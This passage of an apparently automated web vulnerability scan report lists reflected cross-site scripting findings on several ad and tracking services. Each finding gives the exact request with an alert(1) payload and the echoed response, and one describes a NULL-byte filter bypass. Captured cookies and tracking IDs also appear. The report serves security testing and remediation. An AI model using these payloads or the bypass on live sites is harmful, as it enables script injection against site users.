Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 5:29:52 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 553
Date: Mon, 11 Apr 2011 16:21:48 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;~okv=;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?20d43';alert(1)//82d6def5476http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=532355">
...[SNIP]...

1.50. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99ce8'%3balert(1)//73fc8a370f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99ce8';alert(1)//73fc8a370f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f&99ce8'%3balert(1)//73fc8a370f3=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 5:02:10 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 556
Date: Mon, 11 Apr 2011 16:21:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;~okv=;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?&99ce8';alert(1)//73fc8a370f3=1http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=532355">
...[SNIP]...

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 73bbb<script>alert(1)</script>6a653815b0a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds73bbb<script>alert(1)</script>6a653815b0a&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:21:49 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wds73bbb<script>alert(1)</script>6a653815b0a)

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload aa726<script>alert(1)</script>84d30c56979 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=aa726<script>alert(1)</script>84d30c56979 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:21:51 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: aa726<script>alert(1)</script>84d30c56979

1.53. http://api.kickapps.com/rest/comments/62976 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.kickapps.com
Path:   /rest/comments/62976

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ad4e3<script>alert(1)</script>98d73742cf0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/comments/62976?pgNum=1&pageSize=1&url=http%3A//www.wptz.com/news/27483035/detail.html&t=0SD0svP/Zk58tfSWXNJ/thuqOKP802x3&mediaType=emedia&userId=0&callback=IBSYS.hrst.commentCount.onKACommentDataad4e3<script>alert(1)</script>98d73742cf0 HTTP/1.1
Host: api.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 09 Apr 2011 12:31:30 GMT
Server: Noelios-Restlet-Engine/1.0..11
Content-Language: *
Content-Type: text/plain;charset=UTF-8
Content-Length: 167

IBSYS.hrst.commentCount.onKACommentDataad4e3<script>alert(1)</script>98d73742cf0({"totSize":0,"payload_type":"json","status":"1","results":[],"error":"","totPages":0})

1.54. http://api.zap2it.com/tvlistings/ZCShowtimeAction.do [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/ZCShowtimeAction.do

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00474b3'%3balert(1)//fa25becbfb0 was submitted in the aid parameter. This input was echoed as 474b3';alert(1)//fa25becbfb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tvlistings/ZCShowtimeAction.do?ap=wo&md=getPrimetimeWhatsOn&v=2&aid=wptzdt2%00474b3'%3balert(1)//fa25becbfb0&zip=12901&stnlt=53393 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: public
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: Sat, 09 Apr 2011 12:30:01 GMT
Date: Sat, 09 Apr 2011 12:30:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
e(obj, 'd', 'PDF Document', 'Default Grid View');
zc.openPrintPage();
}

dfpKeyValues='';
var ty='';
var z = 'default';
var dfp_zip='';
var dfp_aid='wptzdt2.474b3';alert(1)//fa25becbfb0';
var dfp_lid='';

</script>
...[SNIP]...

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 4c6c5<script>alert(1)</script>2e6cc7273d9 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=84c6c5<script>alert(1)</script>2e6cc7273d9&c2=6820648&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"84c6c5<script>alert(1)</script>2e6cc7273d9", c2:"6820648", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload d6794<script>alert(1)</script>7f680a795f was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=d6794<script>alert(1)</script>7f680a795f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 18 Apr 2011 17:41:23 GMT
Date: Mon, 11 Apr 2011 17:41:23 GMT
Connection: close
Content-Length: 1233

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"d6794<script>alert(1)</script>7f680a795f", c15:"", c16:"", r:""});



1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 980ee<script>alert(1)</script>cda0329ceaa was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=980ee<script>alert(1)</script>cda0329ceaa HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 18 Apr 2011 17:41:23 GMT
Date: Mon, 11 Apr 2011 17:41:23 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"980ee<script>alert(1)</script>cda0329ceaa", c16:"", r:""});



1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3fefc<script>alert(1)</script>27501cbb4f9 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=68206483fefc<script>alert(1)</script>27501cbb4f9&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3